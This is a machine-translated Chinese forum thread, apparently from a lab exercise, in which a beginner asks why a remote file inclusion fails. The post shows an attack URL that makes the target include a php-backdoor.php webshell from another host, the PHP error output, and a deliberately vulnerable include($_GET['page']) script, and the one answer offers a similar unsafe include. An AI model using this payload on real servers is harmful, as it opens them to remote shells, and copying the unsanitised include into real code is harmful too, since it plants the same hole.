-1

当我试图对给我的网页进行后门以查找特定文件时,在请求 shell 时,我在页面上收到以下警告,并且没有提供其他信息。应该弹出一个外壳吗?我对 RFI 有点陌生,这是我第一次使用它。

我使用的链接是:

http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php

搜索时的显示是:

Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5

Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5

description.php 看起来像这样:

<?php
$image_name = $_GET['page'];

// Get the description from another file
include($image_name);

?>

问题是什么?我有点卡住了。

我应该创建一个 HTTP 服务器来推送我的 shell 吗?我读过一些关于这个但不确定这意味着什么

甚至文章的链接也值得赞赏

4

1 回答 1

0

我不知道 php 脚本在您尝试包含远程页面的位置如何,但它必须类似于:

$incfile = $_REQUEST["file"]; include($incfile.".php");
于 2019-11-12T18:55:00.807 回答